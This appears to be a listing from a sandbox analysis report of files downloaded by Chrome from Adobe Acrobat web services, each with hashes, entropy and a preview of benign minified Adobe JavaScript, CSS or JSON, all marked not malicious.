                                                      SHA-256:77436E14979D6E26E8E59B2F8970FBA8CB495666E87188B2C78855C3E5D605FD
                                                      SHA-512:EE1B0E5002037C4717409F109898CA3397E5938087D51CFA7E303C5ABF23C8771667A7DA80F05E3615D17F1672B3EB38B451B244B699423EC231B100A9F4C2C1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-review-dropin/3.21.0_2.323.0/frictionlessPanel-chunk.js
                                                      Preview:(self["webpackJsonp-review"]=self["webpackJsonp-review"]||[]).push([[740],{rmjt:(e,t,r)=>{"use strict";var n=r("AAps");Object.defineProperty(t,"Zp",{enumerable:!0,get:function get(){return i.default}}),Object.defineProperty(t,"bw",{enumerable:!0,get:function get(){return a.default}}),Object.defineProperty(t,"Xp",{enumerable:!0,get:function get(){return s.default}});var i=n(r("NRbv")),a=n(r("Jh2l")),l=n(r("vDin")),o=n(r("CyEC")),s=n(r("WGSU"))},NRbv:(e,t,r)=>{"use strict";var n=r("AAps");Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var i,a,l,o=n(r("z3HK")),s=n(r("jp00")),m=n(r("QNma")),d=n(r("vPca")),c=n(r("khqL")),k=n(r("qavZ")),p=n(r("qJYQ")),u=n(r("i44B")),y=n(r("AAps")),E=n(r("uqI5")),L=n(r("da+B")),f=n(r("PZ3W")),_=n(r("vsH4")),g=n(r("e1tA")),h=r("f6H/"),A=n(r("/hLX")),C=n(r("YWiy"));r("gA9v");var T={"cs-CZ":(0,y.default)(r("54Yc")).default,"da-DK":(0,y.default)(r("tONz")).default,"de-DE":(0,y.default)(r("TLeo")).default,"en-US":(0,y.default)(r("Y756")).default
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):56
                                                      Entropy (8bit):4.3158230035695615
                                                      Encrypted:false
                                                      SSDEEP:3:YAiKBAHfe/pHoEyuxTf:YAiaife/pFB
                                                      MD5:3E090E08D95EEECF3E3500335B6903AC
                                                      SHA1:585145AD697A1D80A591D499A3391B3D508C88D7
                                                      SHA-256:803B67EA86C7F9DE8043372B7D0C585EC0C7E06479EE79AE4D149E17A1A7D737
                                                      SHA-512:E1EBBB27EB7F77A8C4F938F88768A3AE5AE5976F9F7A003E2DD222904A441A4C22FD7E9D3DA8330DF775C3AB30A72E21E495B51DD603B859AA913E8A723D028E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{"error_code":"403000","message":"Api Key is required"}.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65458)
                                                      Category:downloaded
                                                      Size (bytes):557539
                                                      Entropy (8bit):5.652502227158188
                                                      Encrypted:false
                                                      SSDEEP:6144:hB1YBLX4TQcKXf4FpSDnTV8wyiOzmSvg5iEtclsNu74GYBJ:hBGBLX4rsBOzmSoik5
                                                      MD5:672FE642E3F878D1834D317BD7E26D39
                                                      SHA1:9E5DDD1C6E4FB39B8D9F16030C83ECC2D9069632
                                                      SHA-256:111E681C825E14BB38BD4E11F470DA058047DFB98474FA414088D52343F3402A
                                                      SHA-512:FA98E5C18A9C721711D38CEA1B54BBD858CA7B2A1EB2B96CC00AE6AA1676C6DC3F0B8EB4D1071A5AA716A41293E7C7B46246DA8BE0B910F2E831232002EE1D2D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1133.0/acroform-chunk-chunk.js
                                                      Preview:/*! For license information please see acroform-chunk-chunk.js.LICENSE.txt */.(self["webpackJsonp-preview"]=self["webpackJsonp-preview"]||[]).push([[9035],{"8G+c":(t,y,T)=>{var R;self,R=(t,y,T,R)=>(()=>{var P,M,N,L,B={7757:(t,y,T)=>{t.exports=T(5666)},3070:(t,y,T)=>{"use strict";T.d(y,{Z:()=>gl});var R=T(3144),P=T(5671);function i(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}function a(t,y){return a=Object.setPrototypeOf||function(t,y){return t.__proto__=y,t},a(t,y)}function s(t,y){if("function"!=typeof y&&null!==y)throw new TypeError("Super expression must either be null or a function");t.prototype=Object.create(y&&y.prototype,{constructor:{value:t,writable:!0,configurable:!0}}),y&&a(t,y)}function l(t){return l="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},l(t)}func
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):64
                                                      Entropy (8bit):4.4921329146247215
                                                      Encrypted:false
                                                      SSDEEP:3:YWR4bLvfHfLh3bHwM6MQMjWexY:YWybLHtrHwM6/NexY
                                                      MD5:4850DEB19886EF66A2491A71369DCB0C
                                                      SHA1:241C2903C8A0FBB1ADA19183C473BAD7B3224473
                                                      SHA-256:50F2F7B6CC1456491C18D87B2F6B91B30E131E6F4C5BB9788A76A35C94C59CAD
                                                      SHA-512:8CBBAC7CD756D5D944846DEFF477A391E7502170D7DDC80CD158DEF2332D490DDFAE22640DF8212B6FD61A84ECAD05F6889D850FA6BFA024477EDDFC2E252647
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://cdn-sharing.adobecc.com/rendition/id/urn:aaid:sc:EU:cef22cee-e97f-4efd-9256-9a2eaeaf8ce5;page=1;size=1200;type=image%2Fjpeg?access_token=1742347604_urn%3Aaaid%3Asc%3AEU%3Acef22cee-e97f-4efd-9256-9a2eaeaf8ce5%3Bpublic_2f328c00d91d519b0e227d76a25f11467ec0f450&api_key=dc_sendtrack
                                                      Preview:{"status":404,"type":"NOT_FOUND","detail":"Rendition not found"}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65378), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):180922
                                                      Entropy (8bit):5.450363637134542
                                                      Encrypted:false
                                                      SSDEEP:3072:JsgbYGmEfFu05PaQmp5+3lIHiahZSNacIL4lSBqQ7v4X4GHD5jFc6Fcb/gNzIWqo:JsgEGmEfdoFqz
                                                      MD5:EB9638F1454AABB46FDEC90DC9DD09E7
                                                      SHA1:86DCF9E18B9E95BE7D0FBB219B7AFD332410669E
                                                      SHA-256:E77B06669D8E27450073C8DE2C9EB9E90CFDBCC12BCDFA8BA47E6F9B0EF98B20
                                                      SHA-512:2735200FA8825CDBE1FD1536375A57F15BC7D7D493BF33CED3A0C074C590D3ABD89837FB377C984DE2D2D5BBA46534C6BDC7045C64DABB158D3EF33DEDB764F8
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-web-app-dropin/3.18.0_2.208.0/648.js
                                                      Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[648],{"8KsQ":(e,a,r)=>{"use strict";a.U=CrossLarge;var t=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("YWiy"));function _extends(){return _extends=Object.assign||function(e){for(var a=1;a<arguments.length;a++){var r=arguments[a];for(var t in r)Object.prototype.hasOwnProperty.call(r,t)&&(e[t]=r[t])}return e},_extends.apply(this,arguments)}function _objectWithoutProperties(e,a){if(null==e)return{};var r,t,n=function _objectWithoutPropertiesLoose(e,a){if(null==e)return{};var r,t,n={},o=Object.keys(e);for(t=0;t<o.length;t++)r=o[t],a.indexOf(r)>=0||(n[r]=e[r]);return n}(e,a);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);for(t=0;t<o.length;t++)r=o[t],a.indexOf(r)>=0||Object.prototype.propertyIsEnumerable.call(e,r)&&(n[r]=e[r])}return n}function CrossLarge(e){var a=e.scale,r=void 0===a?"M":a,n=_objectWithoutProperties(e,["scale"]);return t.default.createElement("svg",_
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (10800)
                                                      Category:downloaded
                                                      Size (bytes):10840
                                                      Entropy (8bit):5.460709164615657
                                                      Encrypted:false
                                                      SSDEEP:192:LSg3uR3BYrpFRAh5a5DM8tKy4+vA/vxglpFpaF9U+lqsymZPlPLhPHBd:xepBOFRAMM88y4+kZglpCy+lq3mRBd
                                                      MD5:0DAD1609D9D18A332430727F2EB235B7
                                                      SHA1:6BA54691A431B18D96AF5713188F0F699760E57B
                                                      SHA-256:79C97834CC90598563B1238025A5BAB1740AF4CF7818B8E9FB6AED1EFA586D24
                                                      SHA-512:3F09D74DC516BD394937CC3C6E0F3F585EA3C3A3FA38ED4F64380D2F45025BE0BBC96FF0E2815FD8C70A96CEFC8B9F2D58C878DED3F9B30A69433E779C8FBBB6
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-web-app-dropin/3.18.0_2.208.0/908.js
                                                      Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[908],{AXyZ:e=>{"use strict";e.exports=function(e){var n=[];return n.toString=function toString(){return this.map((function(n){var t=function cssWithMappingToString(e,n){var t=e[1]||"",r=e[3];if(!r)return t;if(n&&"function"==typeof btoa){var a=function toComment(e){var n=btoa(unescape(encodeURIComponent(JSON.stringify(e)))),t="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(n);return"/*# ".concat(t," */")}(r),o=r.sources.map((function(e){return"/*# sourceURL=".concat(r.sourceRoot||"").concat(e," */")}));return[t].concat(o).concat([a]).join("\n")}return[t].join("\n")}(n,e);return n[2]?"@media ".concat(n[2]," {").concat(t,"}"):t})).join("")},n.i=function(e,t,r){"string"==typeof e&&(e=[[null,e,""]]);var a={};if(r)for(var o=0;o<this.length;o++){var i=this[o][0];null!=i&&(a[i]=!0)}for(var l=0;l<e.length;l++){var s=[].concat(e[l]);r&&a[s[0]]||(t&&(s[2]?s[2]="".concat(t," and ").concat(s[2]):s[2]=t),n.p
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (61341), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):61387
                                                      Entropy (8bit):4.805165870045171
                                                      Encrypted:false
                                                      SSDEEP:1536:5Lm1DuCCfcxgURlbaiqLgqyR4hpPnuc/C2O9INpnL7gwdlyf8gsIdNRKIJGIBLUF:5GDuCZgngUgiW87Z
                                                      MD5:7A9E1A8BF8C88E5866D27AB11B1C1BA5
                                                      SHA1:B7C9437073550AC689969FE0E9D24731E3E205FC
                                                      SHA-256:1D135788674B1BE4D192CE88B0AE32F6B9DC068ACC711E720688043446235DC5
                                                      SHA-512:7C0B614F6469C27E9C36EE0B70D987FBEE2DD2D9FA04CB7206EA254FB08BDEBB55A5054D16D3EBE84DB6D5EA67337A0B714E4BA22A8B6FF0EC18C8B17021DC0D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1239.0/translations-en-US-json.js
                                                      Preview:"use strict";(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[7818],{R5i5:e=>{e.exports=JSON.parse('{"compress.dropzone.heading.seo":"Compress a PDF","compress.dropzone.description.seo":"Drag and drop a PDF to reduce its file size with our PDF compressor.","cpdf-base.dropzone.heading.seo":"PDF converter","cpdf-base.dropzone.description.seo":"Drag and drop a PDF, Microsoft Word, Excel, PowerPoint, or image file to use our PDF converter.","cpdf-base.dropzone.description.extraSmall.seo":"Convert a PDF, Microsoft Word, Excel, PowerPoint, or image file","excel.dropzone.heading.seo":"Excel to PDF converter","excel.dropzone.description.seo":"Drag and drop a Microsoft Excel file (XLSX or XLS) to use our Excel to PDF converter.","jpg.dropzone.heading.seo":"JPG to PDF converter","jpg.dropzone.description.seo":"Drag and drop an image file (JPG, PNG, BMP, and more) to use our PDF converter.","ppt.dropzone.heading.seo":"Convert PPT to PDF","word.dropzone.heading.seo"
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (4330)
                                                      Category:downloaded
                                                      Size (bytes):4379
                                                      Entropy (8bit):4.375577950983542
                                                      Encrypted:false
                                                      SSDEEP:96:JMMuZkS+DoFGQl4FIdR9akMma9gG2e+J6Pdnepo3di:fuZ2DkRrHMz9nfe2i
                                                      MD5:2E63D496E68BF767E315606088842AE3
                                                      SHA1:0061AF806DB504D6539E37B62A9CA7873FA0EC5D
                                                      SHA-256:8C02536F1C452CF893340CE1F5EB8B06085261041AF2041F8DAF670F892D5A37
                                                      SHA-512:3267154D9800A92CC54CA14499C9DBC2EC293111AA5EDBA531F4CD54E9C554A3E4830735C9EBC830B012678D15610BD5726A37A984EE1EE1CCD3DFE79081FE25
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1239.0/convert-icon.js
                                                      Preview:(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[5571],{"7eDv":(e,C,t)=>{var l=t("YWiy");function SCategoryConvert18(e){return l.createElement("svg",e,l.createElement("g",{fill:"none",fillRule:"evenodd"},[l.createElement("path",{fill:"#707070",fillRule:"nonzero",d:"M5 14L2.38 14C2.1701318 14 2 13.8298682 2 13.62L2 12.38C2 12.1701318 2.1701318 12 2.38 12L5 12 5 10.2C5.0099758 10.1097714 5.0894516 10.0435415 5.18 10.05 5.2236287 10.0476071 5.2665328 10.0619085 5.3 10.09L7.91 12.92C7.9699702 12.9810728 7.9699702 13.0789272 7.91 13.14L5.3 15.91C5.2269334 15.9685001 5.1230666 15.9685001 5.05 15.91 5.0198566 15.8810929 5.001959 15.8417182 5 15.8L5 14zM5 8C2.2385763 8 0 10.2385763 0 13 0 15.7614237 2.2385763 18 5 18 7.7614237 18 10 15.7614237 10 13 10 10.2385763 7.7614237 8 5 8zM8.92587353 8.98830508C9.0706394 8.70627729 9.20470323 8.4188253 9.32776669 8.12656125 9.52507046 7.65729822 9.69694215 7.20977553 9.8638915 6.72082314 9.41882997 5.73635525 9.30397538 4
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (8786)
                                                      Category:downloaded
                                                      Size (bytes):8840
                                                      Entropy (8bit):5.413070825211609
                                                      Encrypted:false
                                                      SSDEEP:192:ZJdejsVsq7wqizNXFZqd9ugc+NgZZ3gsV3VGjiG3RW/z47t3cq:1n7ti5j8NgZZFDKigW/z42q
                                                      MD5:B5A2FF9AA59200121E7756D479132ED8
                                                      SHA1:3592FC7021910C576DDE720939BA786CA7F3F7A8
                                                      SHA-256:1450CC9C4C14224EF8347827B05B1384DD76376420A06C9471D51F6D521CCE7A
                                                      SHA-512:49DDB77530CF4A6C5A8F20423ECA41C076739CC5C2253FC76FCB73B615688B7364553CA97247EEC49FE9B9BE010D95A835D81BD4D9DB28AF0D9265E0D64EFF04
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/fs2QTverbs8-chunk.js
                                                      Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[2925,1937],{yULq:(e,i,t)=>{"use strict";t.d(i,{v:()=>h});var r=t("YWiy"),s=t("Zm2D"),n=t("/hLX"),o=t("plsW"),a=t("ylf9"),l=t("B99j"),c=t("QwKn"),d=t.n(c),p=t("UpqL"),g=t("32It"),u=t("vwms"),b=t.n(u),f=t("4R+0"),y=t("1ZEG"),m=t("ezSO"),S=t("vhd8"),v=t("3oOw"),F=t("kVs5");const QTSignatureItemBase=e=>{var i,t;const[s,n]=(0,r.useState)(null),{selectedTool:o,sigData:c,setSigData:p,initialized:u,removeScribble:h,maybeAddFieldViaKeyboard:w}=(0,g.y)();return(0,r.useEffect)((()=>{if(null===s){var e;let r="verb-sendforsignature";var i,t;if(y.r$.getFillSignConfig().fillSignInEmbed&&!(null===(e=y.r$.getFillSignConfig())||void 0===e?void 0:e.disableRequestSignatureinFS)&&F.A.hasRSInQT())r=null!==(i=null===(t=y.r$.getFillSignConfig())||void 0===t?void 0:t.requestSignVerbID)&&void 0!==i?i:"verb-sendforsignature",(0,v.BN)(r,{context:"ChromeExtViewer",selectionName:"EmbedViewer"},(()=>{})),n(!0);else(0,v.BN)(r,{context:"ModernV
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (9928)
                                                      Category:downloaded
                                                      Size (bytes):10021
                                                      Entropy (8bit):4.929986085720456
                                                      Encrypted:false
                                                      SSDEEP:96:54oqGPSvXqKw874Yj4H37zIzIC4/47T4GHpG7c0rmMz2:QQYjuC4/Q0GHpG72Mq
                                                      MD5:7F969396D26B9B5B6BDE9CFB19C79AA6
                                                      SHA1:39CF5E97184472F0F125494071A1A05D105BC575
                                                      SHA-256:31E49798893180092A89C218ABACBCFBCA52E7CC93EBB7BC8FDE8FD942517612
                                                      SHA-512:79E77923EA93CF13ABD21331A3384C5111CFF3AA896B237D9B3F5EB61DF8DFE47ADAD00037822F25C36605574331D998144FEFB40EE4FE168CA3EFF71B67B090
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://prod.adobeccstatic.com/unav/1.4/UniversalNav.css
                                                      Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */...universal-nav-container #universal-nav.universal-nav-light{--alias-icon-neutral-default:#292929;--alias-content-neutral-default:#292929;--alias-background-semantic-accent-default-express:#5258E4;--alias-background-semantic-accent-default-spectrum:#0265DC;--alias-background-semantic-accent-default-spectrum-2:#3B63FB;--alias-background-semantic-accent-hover-spectrum-2:#274DEA;--alias-background-semantic-accent-hover-spectrum:#0054B6;--alias-background-semantic-accent-hover-express:#4046CA;--alias-icon-neutral-key-focus:#507BFF;--alias-content-neutral-key-focus:#507BFF;--border:#E1E1E1;--white-text:#FFF;--focus-ring:#507BFF;--profile-cta-secondary-border:#DADADA;--alias-icon-background-neutral-default:#292929;--alias-content-background-neutral-default:#292929;--profile-cta-hover-border:#C6C6C6;--spectrum-gray-200:#E1E1E1;--icon-palette-gray-25:#FFF;--icon-palette-gray-75:#F3F3F3;--icon-palette-gr
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):233913
                                                      Entropy (8bit):5.39820163848904
                                                      Encrypted:false
                                                      SSDEEP:3072:vT/TDP8ghbl/okIF3Pxm7rzWMWsYShK3dsOX/pwYLI5O5wq+ZDpCZSgQTxyHfj/:vT/TDP8x3kPZDpChyyHL/
                                                      MD5:7CFE036DD7A37C6E847E8436304EE09C
                                                      SHA1:0ECD904282F08CBF332085CEF77262BD8759FAA2
                                                      SHA-256:4638659D25B65445B7905C4671DEF01ED1381AB94B7487F4FCB7C69CC86D09F7
                                                      SHA-512:3821CEB53BDE7F896F4F68A5E335F2185AE519852FB9AB8CEC90FC3ED95227EFCC777E157A5DF83F0DD103BF927DE9D9F9B83B580D4852E94D7E1110151B234C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/7289-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[7289],{oXgF:(e,t,a)=>{"use strict";t.c=ChevronLeftMedium;var r=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(a("YWiy"));function _extends(){return _extends=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var r in a)Object.prototype.hasOwnProperty.call(a,r)&&(e[r]=a[r])}return e},_extends.apply(this,arguments)}function _objectWithoutProperties(e,t){if(null==e)return{};var a,r,i=function _objectWithoutPropertiesLoose(e,t){if(null==e)return{};var a,r,i={},c=Object.keys(e);for(r=0;r<c.length;r++)a=c[r],t.indexOf(a)>=0||(i[a]=e[a]);return i}(e,t);if(Object.getOwnPropertySymbols){var c=Object.getOwnPropertySymbols(e);for(r=0;r<c.length;r++)a=c[r],t.indexOf(a)>=0||Object.prototype.propertyIsEnumerable.call(e,a)&&(i[a]=e[a])}return i}function ChevronLeftMedium(e){var t=e.scale,a=void 0===t?"M":t,i=_objectWithoutProperties(e,["scale"]);return r.default.createElemen
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (16334)
                                                      Category:downloaded
                                                      Size (bytes):16524
                                                      Entropy (8bit):5.21705279611525
                                                      Encrypted:false
                                                      SSDEEP:384:UA8sSnVTqxkgYToHLbf37VBx/oxdgcsoQD1gxXAj7:UAbSnVT6ETArLVBx/UwoSyXAj7
                                                      MD5:B683FEFE3BABF990EBD8F38B5288974A
                                                      SHA1:4225B9F7032BAE15982CB7C2314CDA69BAEED4BE
                                                      SHA-256:81028D0AFBF8744988C5FEF1FE323CE4072DF14AC64FB5646479FFC6761DA6F3
                                                      SHA-512:7437667A94E312BE9F34F92F643E82B6D04BDBE6A418BA9735169EBC9BB25D32907E6A92829832F5D26DAF3354A0683F41AD085DF8521EE0706501AA1A4B841A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://prod.adobeccstatic.com/unav/1.4/JarvisLoader.16a27b721357bbce610e.bundle.js
                                                      Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */./*! For license information please see JarvisLoader.16a27b721357bbce610e.bundle.js.LICENSE.txt */."use strict";(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["JarvisLoader"],{485:(t,e,r)=>{r.d(e,{Z:()=>f});var n={profileJsUrl:"https://shared-components.adobe.com/component-loader/1.0.128/main.js",version:"1.4",uncJsUrl:"https://prod.adobeccstatic.com/unc/10.0/UNC-shared.js",adobeCCStaticBase:"https://prod.adobeccstatic.com/unav",help:{helpXURL:"https://helpx.adobe.com/support.cc.html"},community:{communityURL:"https://community.adobe.com"},jarvis:{jarvisJSUrl:"https://client.messaging.adobe.com/latest/AdobeMessagingClient.js",jarvisCSSUrl:"https://client.messaging.adobe.com/latest/AdobeMessagingClient.css"},commerceUriBase:"https://commerce.adobe.com",footer:{},theme:"light",ingest:{environment:"prod",rsid:"adbem-cchome-prod"}};function o(t){return o="function"==typeof
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65469), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):522516
                                                      Entropy (8bit):5.339505865590107
                                                      Encrypted:false
                                                      SSDEEP:6144:IDEFlzKS/tj2jJ0b5UXqPwr583G0eY2KxqDB:IoFlk0eYe
                                                      MD5:D7AF24AE6E23B6BC44923A0C517DA8F6
                                                      SHA1:66315A36FD83ABBE4AA54C03509E6EB6F374E6DF
                                                      SHA-256:B47696D51178028056BDF0222D52EE2E55FAD93E86ED3D009E1096317108CAB7
                                                      SHA-512:2434F676A8318F787B133E91E8E67B39BDBF3B849F7A54064FAB71F0258116DACF29BDABDC4E944753BF4071C9EC2AF6BD5E6092EC060F6DB6383A0DAA73A7C4
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/EmojiPickerComponent-RHComments-expandedPanelContainer-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[568],{"upf+":(e,i,n)=>{function $parcel$interopDefault(e){return e&&e.__esModule?e.default:e}function $c770c458706daa72$export$2e2bcd8739ae039(e,i,n){return i in e?Object.defineProperty(e,i,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[i]=n,e}n.d(i,{LC:()=>$efa000751917694d$export$2e2bcd8739ae039,Ts:()=>$7adb23b0109cc36a$export$2cd8252107eb640b,aw:()=>$693b183b0a78708f$export$5ef5574deca44bc0});var a,f,s,o,d,r,t={},l=[],u=/acit|ex(?:s|g|n|p|$)|rph|grid|ows|mnc|ntw|ine[ch]|zoo|^ord|itera/i;function $fb96b826c0c5f37a$var$a(e,i){for(var n in i)e[n]=i[n];return e}function $fb96b826c0c5f37a$var$h(e){var i=e.parentNode;i&&i.removeChild(e)}function $fb96b826c0c5f37a$export$c8a8987d4410bf2d(e,i,n){var f,s,o,d={};for(o in i)"key"==o?f=i[o]:"ref"==o?s=i[o]:d[o]=i[o];if(arguments.length>2&&(d.children=arguments.length>3?a.call(arguments,2):n),"function"==typeof e&&null!=e.defaultProps)for(o in e.default
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):67
                                                      Entropy (8bit):4.507826086071084
                                                      Encrypted:false
                                                      SSDEEP:3:YGKeMfQ2pHWiR8Fj9GwupfFtOkOAh/:YGKed2pHDZZfOo/
                                                      MD5:19F7FE5FD15CFFCDBB687BF337E70CCC
                                                      SHA1:817251F23C4762E78D355AF65AD468F6FD9C86C1
                                                      SHA-256:2325A57C99FD96CFC9F0ADB6D1342E0FCE38C3E2CBD7620A379975033100663B
                                                      SHA-512:DBC757046CC6E154A7AF6D99DAF6796561A20E7860888C5133A6FA4B844DC65E36C5BB0B0F0353E87D52330996A618BA5D74C3F2484991897BAE3DD7A2CC08AE
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://geo-dc.adobe.com/json/
                                                      Preview:{"country":"US","state": "NJ","Accept-Language" : "en-US,en;q=0.9"}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65462)
                                                      Category:downloaded
                                                      Size (bytes):745047
                                                      Entropy (8bit):5.639577804794797
                                                      Encrypted:false
                                                      SSDEEP:6144:KN2Y0GkyeXiJ35mMW95zD1yLtDt5C64j2zvCUaGToqA7yLisJQHryy4k56d5EMD6:EmktDt57zjToJO4ryyxdgMpj
                                                      MD5:9E3D26DB3ED9DEEB0B02EAAABD847BB1
                                                      SHA1:8B22CBE22DA023CEB5694D65AB4E8A4DA0D04AE2
                                                      SHA-256:CA1B9EECC9807A3444D5D1B247C17F1E3CD4E7062F0E21B448010299200424C6
                                                      SHA-512:B5EA10D20DAE0570A1B5B2BF7734080D497C9E955014E8BB963DF35665E190F3A8B2FF2FE6F884981291B6019AA004983118650FB7994C7D3FABE644E138D8EC
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/RHComments-chunk.js
                                                      Preview:/*! For license information please see RHComments-chunk.js.LICENSE.txt */.(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[4763],{NQnz:(e,t,A)=>{"use strict";var n=A("YWiy");e.exports=n.createElement("svg",{viewBox:"0 0 36 36"},n.createElement("path",{d:"M6.745 12.073h-5.29A1.473 1.473 0 0 0 0 13.564v8.942A1.473 1.473 0 0 0 1.455 24h5.29a1.429 1.429 0 0 1 .93.345l7.13 7.259A.727.727 0 0 0 16 31.029V5a.726.726 0 0 0-1.194-.571l-7.127 7.3a1.437 1.437 0 0 1-.934.344zM22.04 18a6.936 6.936 0 0 1-1.408 4.192.981.981 0 0 0 .087 1.288l.016.016a.991.991 0 0 0 1.486-.09 8.954 8.954 0 0 0-.021-10.853.991.991 0 0 0-1.484-.087l-.016.016a.982.982 0 0 0-.084 1.293A6.944 6.944 0 0 1 22.04 18z"}),n.createElement("path",{d:"M28.04 18a12.937 12.937 0 0 1-3.116 8.436.972.972 0 0 0 .063 1.317l.014.014a1 1 0 0 0 1.474-.069 14.98 14.98 0 0 0-.027-19.43 1 1 0 0 0-1.467-.068l-.015.015a.977.977 0 0 0-.066 1.319A12.939 12.939 0 0 1 28.04 18z"}),n.createElement("path",{d:"M34.04 18a18.92 1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65520), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):139753
                                                      Entropy (8bit):5.5257405654785945
                                                      Encrypted:false
                                                      SSDEEP:768:Yi5p8N67kbnMyR9m9NHQOpqutAh06ORCALbVrDeDIcXzOElMxwPPKI5lhrM1XpZq:3GnMyR97OAljsJNo5T1lyPTcyK3joF0
                                                      MD5:C1D7BDA130D81A341365ABF58CD874C8
                                                      SHA1:4C473F18FA9B7865655C838604FD1662A92827C0
                                                      SHA-256:8B22B98BF9E4C96D9A14567778568FACEB858FE625952CB6F26C595B7FD7DF3D
                                                      SHA-512:71DDD5AB9ABD887443646FC02C09E896067B9332F17C1434C66E2537093E6731A9832DF230CC5390A32EA92E41634D4CEC7D398DAABD1AF0349CF884DA8EB705
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/RHComments-expandedPanelContainer-chunk.js
